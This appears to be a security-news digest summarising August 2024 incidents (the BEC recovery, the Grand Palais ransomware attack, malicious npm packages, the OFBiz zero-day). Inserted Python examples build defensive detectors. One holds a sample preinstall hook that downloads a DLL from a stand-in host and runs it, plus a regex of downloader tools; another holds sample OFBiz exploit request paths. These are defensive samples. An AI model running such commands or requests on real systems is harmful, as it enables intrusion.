Daily Brief
Find articles below, see 'DETAILS' for generated summaries
Total articles found: 12775
Checks for new stories every ~15 minutes
| Date | Source | Category | Title | Summary | Details |
|---|---|---|---|---|---|
| 2024-08-06 16:13:47 | thehackernews | CYBERCRIME | INTERPOL Recovers $41 Million From Largest BEC Scam in Singapore | INTERPOL facilitated the recovery of $41 million stolen through a Business Email Compromise (BEC) scam targeting a Singaporean commodity firm.
The firm was deceived into transferring $42.3 million to a fraudulent account after receiving a tampered email supposedly from a trusted supplier.
Authorities used INTERPOL's Global Rapid Intervention of Payments (I-GRIP) mechanism to freeze $39 million in the fraudulent account the day after the firm discovered the fraud.
The investigation led to the arrest of seven suspects in Southeast Asia and the recovery of a further $2 million tied to the scam.
Launched in 2022, I-GRIP has helped intercept hundreds of millions of dollars in proceeds from financial crime and cybercrime worldwide.
INTERPOL is urging businesses and individuals to implement preventative measures against BEC and other social engineering scams; out-of-band verification of any change to a supplier's payment details remains the basic control against this kind of fraud.
INTERPOL also disclosed a crackdown on the cryptocurrency exchange "Cryptonator," which laundered proceeds from cybercrime and lacked adequate anti-money laundering controls.
Researchers noted the evolving risk of fraud in the cryptocurrency space, highlighting the abuse of blockchain protocols to conduct illicit fund transfers. | Details |
| 2024-08-06 16:03:15 | bleepingcomputer | CYBERCRIME | Ransomware Attack Hits Grand Palais During Olympic Events | Grand Palais Réunion des musées nationaux (Rmn) in France experienced a ransomware attack on August 3, 2024.
The cyberattack was reported to cause operational disruptions but did not affect the ongoing Olympic events taking place at the Grand Palais.
Systems were taken offline to contain the spread, which disrupted the bookshops and boutiques operated at several museums.
Workarounds were then put in place so the museum shops could keep trading independently of the affected systems.
Grand Palais Rmn alerted ANSSI, CNIL, and the Ministry of Culture, with ANSSI providing support in network recovery efforts.
Preliminary investigations have shown no evidence of data exfiltration, although a ransom note was left by the attackers demanding payment in cryptocurrency.
It is suspected that the breach resulted from the compromised credentials of a Grand Palais Rmn collaborator, obtained via info-stealer malware.
No specific ransomware group has claimed responsibility for the attack, leaving the perpetrators unidentified. | Details |
| 2024-08-06 14:46:40 | theregister | MALWARE | Techniques for Bypassing Windows Security Features Exposed | A technique dubbed "LNK Stomping" lets malware run without triggering Windows SmartScreen or Smart App Control (SAC) warnings.
The flaw, present for more than six years, abuses .LNK shortcut files with non-standard target paths or internal structures: when explorer.exe parses such a file it rewrites it in canonical form and, in doing so, drops the Mark of the Web (MotW) before the reputation checks that depend on it are performed.
Elastic Security Labs disclosed this and other methods indicating potential weaknesses in Windows built-in protection systems.
Other techniques described include reputation hijacking (abusing already-trusted programs such as script interpreters), reputation seeding (planting attacker-controlled binaries that behave benignly until triggered) and reputation tampering (altering a known-good binary without losing its reputation), all aimed at undermining Windows' reputation-based protections.
Microsoft acknowledged the report but has made no firm patch commitment, saying only that the issue may be addressed in a future Windows update.
Samples of malware exploiting this bug have been identified on VirusTotal, with the oldest dating back six years.
Until Microsoft ships a fix, defenders are advised to add detections for these LNK and reputation-abuse techniques rather than rely on SmartScreen and SAC alone. | Details |
| 2024-08-06 14:20:41 | bleepingcomputer | CYBERCRIME | Hacker Wipes Thousands of Student Devices Globally | A hacker infiltrated the Mobile Guardian platform, affecting North American, European, and Singaporean instances.
Over 13,000 student devices in Singapore were remotely wiped, impacting iPads and Chromebooks.
The breach occurred on August 4, 2024, and is not related to a prior IT outage on July 30.
There has been no reported data exfiltration, though the devices were unenrolled and wiped.
Mobile Guardian, a cross-platform classroom management tool, has temporarily suspended user access.
The Singapore Ministry of Education has removed the compromised app from student devices and is assisting in recovery.
Investigations continue to assess the full extent of the impact in other regions including North America and Europe. | Details |
| 2024-08-06 14:04:31 | bleepingcomputer | CYBERCRIME | Rising Threat: The Increasing Role of Stolen Credentials in Cyberattacks | Stolen credentials are increasingly utilized by cybercriminals to gain initial access to user accounts, creating heightened security demands and a booming market for such data.
The ENISA Threat Landscape 2023 report highlights significant growth in the Initial Access Broker (IAB) market, with credentials being the prime commodities traded by cybercriminals.
Common tactics to deploy stealer malware include social engineering, phishing, malvertising, and botnets such as Emotet and Qakbot to facilitate the theft of credentials.
The Verizon 2024 Data Breach Investigations Report found that exploitation of vulnerabilities as an initial access vector rose 180% year over year, yet stolen credentials remain the most common initial action in breaches.
Cybercriminals employ a variety of methods for stealing credentials, ranging from malware infection, brute-force attacks, to using search engine ads for directing users to malicious sites.
High-profile breaches like SolarWinds and Dropbox underscore the significant risks and potential damage when credentials are compromised, especially if reused or poorly managed.
Despite advances in cybersecurity measures such as multi-factor authentication, cybercriminals continue to find ways to circumvent these protections, emphasizing the need for continuous enhancement of security protocols.
Organizations are urged to adopt stronger password policies and proactive vulnerability assessments to mitigate the risk posed by stolen credentials and improve overall cybersecurity posture. | Details |
| 2024-08-06 12:22:11 | theregister | CYBERCRIME | Urgent Calls for Microsoft to Fix Outlook's Phishing Flaw | Phishers and scammers abuse Outlook's "friendly name" (display name) handling: the client shows the sender's display name prominently while hiding the actual address, so mail from an arbitrary mailbox can be made to look like it came from a trusted colleague or even an internal address.
Users across various organizations have voiced their concerns, pushing Microsoft to disable or alter this feature to enhance security.
Microsoft’s support forums have seen more than 100 votes urging a change as this feature complicates the detection of fraudulent emails.
Busy and stressed employees often fall for these deceptive emails, resulting in financial and mental health impacts.
Current methods to show actual sender addresses are not practical for all users, especially in older Outlook versions.
Feedback from many users indicates that while Microsoft invests in security through products like Defender in Azure, critical gaps like this remain.
Professionals are pressing Microsoft to add an option that always shows the underlying sender address instead of the display name alone, which would remove a significant aid to phishing. | Details |
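As an added example (not from The Register's article and not Microsoft's logic), the Python below performs the check a mail gateway or a cautious reader would apply to a From header: it decodes the display name, flags display names that embed an email address different from the real sender, and flags display names that match a known contact when the mail arrives from an unexpected domain. The contact directory and the sample headers are constructed for illustration.

```python
"""Flag deceptive "friendly names" (display names) in From headers.

Added example, not from The Register's article or from Microsoft. The
heuristics, the contact directory and the sample headers are constructed.
"""
import re
from email.header import decode_header, make_header
from email.utils import parseaddr

# Constructed directory of people a recipient trusts: display name -> their mail domain.
TRUSTED_CONTACTS = {
    "jane doe": "example.com",
    "accounts payable": "example.com",
}

EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+")


def decode_display_name(raw: str) -> str:
    """Decode RFC 2047 encoded-words so a lookalike name cannot hide in base64/QP."""
    return str(make_header(decode_header(raw))).strip()


def check_from_header(from_value: str) -> list[str]:
    """Return findings for one From header; an empty list means nothing suspicious."""
    name, addr = parseaddr(from_value)
    if not addr or "@" not in addr:
        return ["unparseable From header"]
    name = decode_display_name(name)
    domain = addr.rsplit("@", 1)[1].lower()
    findings = []

    # 1. The display name contains an address that is not the real sender address.
    embedded = EMAIL_RE.search(name)
    if embedded and embedded.group(0).lower() != addr.lower():
        findings.append(f"display name shows {embedded.group(0)!r} but mail is from {addr!r}")

    # 2. The display name impersonates a trusted contact but comes from another domain.
    expected = TRUSTED_CONTACTS.get(name.lower())
    if expected and domain != expected:
        findings.append(f"{name!r} is a trusted contact at {expected!r} but this mail is from {domain!r}")

    return findings


# Constructed sample headers (the last one hides "Accounts Payable" in base64).
SAMPLE_FROM_HEADERS = [
    "Jane Doe <jane.doe@example.com>",
    '"Jane Doe" <jd.payments@evil.example>',
    '"ceo@example.com" <random@evil.example>',
    "=?utf-8?b?QWNjb3VudHMgUGF5YWJsZQ==?= <ap@evil.example>",
]

if __name__ == "__main__":
    for hdr in SAMPLE_FROM_HEADERS:
        print(hdr, "->", check_from_header(hdr) or "ok")
```

Only the first sample passes; the other three show the two patterns the article's complainants describe (an address-shaped display name, and a trusted name on mail from an outside domain). The same logic can be applied to Reply-To, which phishers often use to redirect replies once the display name has done its job.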
| 2024-08-06 11:20:44 | thehackernews | NATION STATE ACTIVITY | North Korean Hackers Deploy Malicious npm Packages, Targeting Windows | North Korea-linked Moonstone Sleet has continued to push malicious npm packages, aimed at Windows systems, into the JavaScript package registry.
The most recent packages, 'harthat-api' and 'harthat-hash', were published on July 7, 2024 and removed shortly afterwards, with no downloads recorded.
Datadog Security Labs, which tracks the cluster under the moniker Stressed Pungsan, linked the packages to Moonstone Sleet's activity.
Attack methods include using bogus ZIP files on LinkedIn or freelancing sites to entice downloads, executing payloads involving malicious npm packages.
Microsoft found that the npm packages could download additional payloads, such as SplitLoader, or lead to credential theft through malicious npm loaders.
Checkmarx's findings highlighted attempts by Moonstone Sleet to deploy trial payloads through the npm registry, possibly testing their infrastructure.
South Korea’s National Cyber Security Center has raised alarms regarding similar campaigns by North Korean groups targeting the construction and machinery sectors via compromised software updates. | Details |
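The packages described above do their damage at install time, when npm runs lifecycle hooks automatically. As an added example, not code from Datadog, Microsoft, Checkmarx or npm, the Python below audits a package.json for install-time hooks (preinstall, install, postinstall, prepare) whose commands download or execute code. The indicator list and both manifests are constructed for illustration.

```python
"""Audit an npm package.json for install-time lifecycle hooks that fetch or run code.

Added example, not code from Datadog, Microsoft, Checkmarx or npm. The
indicator list and both manifests are constructed for illustration.
"""
import json
import re

# Hooks npm runs automatically when a package is installed as a dependency.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Constructed indicators: downloaders, Windows LOLBins, inline code execution, URLs.
SUSPICIOUS = re.compile(
    r"\b(curl|wget|powershell|pwsh|rundll32|regsvr32|certutil|mshta|bitsadmin)\b"
    r"|\bnode\s+-e\b|https?://|\bbase64\b",
    re.IGNORECASE,
)


def audit_manifest(package_json: str) -> dict:
    """Return the package name, the install hooks it defines, and any suspicious ones."""
    pkg = json.loads(package_json)
    scripts = pkg.get("scripts") or {}
    hooks = [h for h in INSTALL_HOOKS if h in scripts]
    findings = [f"{h}: {scripts[h]}" for h in hooks if SUSPICIOUS.search(scripts[h])]
    return {"name": pkg.get("name", "<unnamed>"), "hooks": hooks, "findings": findings}


# Constructed manifests: a normal TypeScript library and a loader-style package.
BENIGN_MANIFEST = """{
  "name": "example-lib",
  "version": "1.0.0",
  "scripts": {"prepare": "tsc -p .", "test": "jest"}
}"""

SUSPECT_MANIFEST = """{
  "name": "example-util",
  "version": "0.0.1",
  "scripts": {
    "preinstall": "curl -s https://cdn.example.invalid/h.dll -o h.dll && rundll32 h.dll,Init",
    "test": "echo ok"
  }
}"""

if __name__ == "__main__":
    for text in (BENIGN_MANIFEST, SUSPECT_MANIFEST):
        result = audit_manifest(text)
        verdict = "SUSPICIOUS" if result["findings"] else "ok"
        print(result["name"], verdict, *result["findings"], sep="\n  ")
```

Run it over every node_modules/*/package.json after a fresh install, or sidestep the problem by installing with `npm install --ignore-scripts` and allow-listing the few packages that genuinely need a build step. A hook that merely exists is reported under "hooks" so a reviewer can still eyeball commands the pattern list does not catch.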
| 2024-08-06 11:20:44 | thehackernews | MISCELLANEOUS | Combatting Insider Threats in SaaS with ITDR and SSPM | Insider threats account for 26% of SaaS security incidents, highlighting significant risks to corporate data.
Typically, insider threats involve legitimate users accessing SaaS applications during normal business hours, making detection challenging.
Identity Threat Detection & Response (ITDR) platforms play a critical role in identifying suspicious behaviors within SaaS applications through monitored event logs.
ITDR platforms can detect anomalies and indicators of compromise (IOCs), signaling potential internal threats when certain thresholds are met.
SaaS Security Posture Management (SSPM) complements ITDR by enforcing Identity-First Security strategies and monitoring for data loss and compliance breaches.
The Principle of Least Privilege (PoLP) is crucial, often revealing that employees have more access than necessary, increasing insider threat risks.
Together, ITDR and SSPM provide a robust approach to preventing, detecting, and responding to insider threats in the SaaS environment. | Details |
| 2024-08-06 10:04:04 | bleepingcomputer | MISCELLANEOUS | Proton VPN Introduces Disguise Features and Anti-Censorship Protocols | Proton VPN has updated its Windows and Android apps to enhance user security and bypass censorship.
A new 'Discreet Icon' feature in the Android app allows users to camouflage the VPN app as a common utility like a calculator or weather app, helping avoid detection in countries where VPNs are banned.
Both apps now include the 'Stealth' protocol, which disguises VPN traffic as ordinary HTTPS traffic; it was previously available only on iOS, macOS and Android and now ships on Windows as well.
'Stealth' protocol assists users in bypassing ISP blocks and avoiding scrutiny from authorities in restrictive regimes.
Proton VPN plans to install new servers that simulate IP addresses from countries low on the Freedom House Index and Democracy Index to enhance service in restrictive regions.
The new servers will not be physically located in the high-risk countries, but instead, use 'Smart Routing' to offer safer connections.
These updates are immediately available, and users can activate new features through the settings menu of the updated app versions. | Details |
| 2024-08-06 09:38:23 | thehackernews | MALWARE | New LianSpy Android Spyware Detected Using Yandex for Stealth | LianSpy, Android spyware discovered by Kaspersky, has been active since at least 2021 and uses Yandex Disk, a legitimate cloud storage service, as its command-and-control channel to evade detection.
The malware can capture screencasts, user files, call logs, and lists of apps, operating covertly with a wide range of permissions.
Disguised as legitimate apps like Alipay or Android system services, it gains system-level access or asks for multiple permissions to draw screen overlays and access data.
LianSpy manipulates system settings to avoid triggering privacy indicators for microphone and camera use introduced in Android 12.
It updates its configuration by polling Yandex Disk every 30 seconds for specific files to download.
Collected data is stored in an SQL table and encrypted before exfiltration; the encryption key is itself wrapped with the attackers' RSA public key, so only they can decrypt it.
Additionally, the malware suppresses notifications to remain unnoticed and employs root access for advanced operations without incoming commands.
It uses legitimately appearing services to obscure its activity and complicate efforts to track the malware’s origins or actors. | Details |
| 2024-08-06 06:34:40 | theregister | CYBERCRIME | International Sting Closes Cryptonator, CEO Charged with Money Laundering | An international law enforcement operation involving the FBI, IRS, and German police resulted in the shutdown of Cryptonator, an online cryptocurrency wallet and exchange platform.
Cryptonator's services were allegedly used for laundering money, with transactions linked to sanctioned entities, dark-web marketplaces, ransomware, and stolen funds, totaling over $158 million.
IRS Special Agent Justin Allen testified that Cryptonator processed significant illicit transactions, including with entities sanctioned by the US.
Roman Boss, the Russian CEO of Cryptonator residing in Germany, is charged with operating an unlicensed money transmitting business and conspiracy to commit money laundering.
During undercover operations, FBI agents used Cryptonator to engage in transactions on dark web sites and with ransomware affiliates, strengthening the case against the platform.
The U.S. Department of Justice and IRS are seeking the arrest of Roman Boss and the forfeiture of all funds connected to the criminal activities facilitated by Cryptonator. | Details |
| 2024-08-06 06:14:03 | thehackernews | MALWARE | Google Fixes Android Kernel Flaw Exploited by Spyware | Google has patched a high-severity vulnerability in the Android kernel, identified as CVE-2024-36971, which was actively exploited in the wild.
The flaw allowed for remote code execution and was being used in limited, targeted attacks, potentially by commercial spyware vendors.
The vulnerability disclosure was part of Google's August 2024 Android security bulletin, which included fixes for a total of 47 security issues.
Other resolved issues include 12 privilege escalation flaws, one information disclosure bug, and one denial of service flaw in the Android Framework.
The August update also covered vulnerabilities in components from Arm, Imagination Technologies, MediaTek, and Qualcomm.
Earlier in June 2024, Google addressed a privilege elevation flaw in Pixel Firmware, also noted for being exploited in targeted attacks.
The Pixel Firmware issue is not limited to Pixel devices but affects the wider Android ecosystem, and fixes are being coordinated with OEM partners.
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) recently mandated federal agencies to fix another unrelated but exploited flaw in Microsoft COM for Windows by August 26, 2024. | Details |
| 2024-08-06 04:32:00 | theregister | CYBERCRIME | Security Breach Causes Mass Device Wipes; Singapore Cuts Ties | Mobile Guardian suffered a security incident on August 4, leading to unauthorized access to managed iOS and ChromeOS devices.
In Singapore, the incident led to 13,000 student devices being remotely wiped, prompting the Education Ministry to sever its relationship with the vendor.
The vendor specializes in device management for the education sector, including web filtering and classroom management tools.
Despite assurances from Mobile Guardian that no user data was accessed, the scale of device disruption has caused significant concern.
Affected regions include Europe and North America, with a small percentage of devices being unenrolled and wiped.
This follows an April security issue where names and email addresses from Singaporean schools were compromised.
Recent technical issues unrelated to the breach involved a configuration error disrupting student internet access.
Singapore's Ministry of Education is now removing Mobile Guardian software from all student devices and seeking alternative security solutions. | Details |
| 2024-08-06 04:16:31 | thehackernews | MALWARE | Critical Zero-Day Exploit Found in Apache OFBiz ERP System | A zero-day vulnerability in Apache OFBiz, an open-source ERP system, allows unauthenticated remote code execution and is rated critical with a CVSS score of 9.8.
Tracked as CVE-2024-38856, it affects Apache OFBiz versions prior to 18.12.15 and stems from incorrect authorization in the controller's override-view handling: the authentication check is applied to the requested URI while a different view is rendered.
As a result, an unauthenticated attacker can reach and execute code through views that should require a login.
CVE-2024-38856 is also a bypass of the fix for a previously addressed path traversal issue, CVE-2024-36104, showing that the earlier patch was insufficient.
The flaw is reachable through the ProgramExport endpoint when it is chained behind request URIs that do not require authentication.
It joins other critical Apache OFBiz vulnerabilities, one of which is being exploited to deploy the Mirai botnet.
Exploitation of such flaws has been increasing, as previous breaches and ongoing threat actor activity show. | Details |
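Because the chaining pattern is visible in the request path itself, it can be hunted in web server logs without any knowledge of the payload. As an added example (not from the article, Apache or the researchers who reported the bug), the Python below parses common/combined-format access logs and flags requests where a code-executing view such as ProgramExport appears behind a different leading request URI under /control/. The log lines are constructed; 'forgotPassword' is assumed here as an example of a request URI that does not require authentication.

```python
"""Spot override-view chaining against Apache OFBiz in web server access logs.

Added example, not from the article, Apache or SonicWall. The log lines are
constructed; 'forgotPassword' is assumed as an example unauthenticated URI.
"""
import re
from urllib.parse import urlsplit

# Views that run code when rendered. Only ProgramExport is named in the
# article; operators are expected to extend this set (assumption).
SENSITIVE_VIEWS = {"ProgramExport"}

# Common/combined log format (assumed), e.g. Apache httpd or nginx in front of OFBiz.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) \S+" (?P<status>\d{3})'
)


def control_segments(request_uri: str) -> list[str]:
    """Return the path segments after '/control/', ignoring the query string."""
    path = urlsplit(request_uri).path
    if "/control/" not in path:
        return []
    tail = path.split("/control/", 1)[1]
    return [seg for seg in tail.split("/") if seg]


def is_override_view_chain(request_uri: str) -> bool:
    """True when a sensitive view appears behind a different leading request URI.

    A direct /control/ProgramExport request goes through the normal login check
    and is not flagged; /control/<other>/ProgramExport is the chaining pattern.
    """
    segs = control_segments(request_uri)
    return len(segs) > 1 and any(seg in SENSITIVE_VIEWS for seg in segs[1:])


def scan_log(lines) -> list[tuple[str, str, str, int]]:
    """Return (ip, method, path, status) for every line matching the chaining pattern."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and is_override_view_chain(m["path"]):
            hits.append((m["ip"], m["method"], m["path"], int(m["status"])))
    return hits


# Constructed sample log using RFC 5737 documentation addresses.
SAMPLE_LOG = [
    '203.0.113.7 - - [06/Aug/2024:09:12:01 +0000] "POST /webtools/control/forgotPassword/ProgramExport HTTP/1.1" 200 512',
    '198.51.100.4 - - [06/Aug/2024:09:12:05 +0000] "GET /webtools/control/ProgramExport HTTP/1.1" 302 0',
    '192.0.2.9 - - [06/Aug/2024:09:13:22 +0000] "GET /webtools/control/main HTTP/1.1" 200 1043',
    '203.0.113.7 - - [06/Aug/2024:09:14:40 +0000] "POST /webtools/control/forgotPassword/ProgramExport?x=1 HTTP/1.1" 200 498',
]

if __name__ == "__main__":
    for ip, method, path, status in scan_log(SAMPLE_LOG):
        print(f"{ip} {method} {path} -> {status}")
```

The second sample line, a direct request to ProgramExport answered with a 302 to the login page, is deliberately not flagged: that is the server doing its job. A 200 on a chained path, as in the first and last lines, is what warrants pulling the request body and checking whether the instance is below 18.12.15.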
| 2024-08-06 02:48:24 | theregister | MISCELLANEOUS | Illinois Amends Biometric Privacy Law, Reducing Business Penalties | Illinois has modified its Biometric Information Privacy Act (BIPA), decreasing fines for repetitive breaches of the same individual’s biometric data.
BIPA originally allowed damages of $1,000 per negligent violation and $5,000 per intentional or reckless violation, with each collection or disclosure of the same person's data counting as a separate violation.
The amendment, recently signed into law, treats repeated collection or disclosure of the same individual's data as a single violation, potentially sparing businesses billions in damages.
Critics, including data privacy experts, argue that the amendment diminishes the deterrence against misuse of biometric data.
Proponents, like the Information Technology and Innovation Foundation, argue the original law was overreaching and stymied business innovation with excessive penalties.
High-profile cases like Meta's $550 million settlement over BIPA claims highlight the law's significant impact on large corporations.
The amendment aims to balance the protection of biometric data with the practicalities of technological and business advancements. | Details |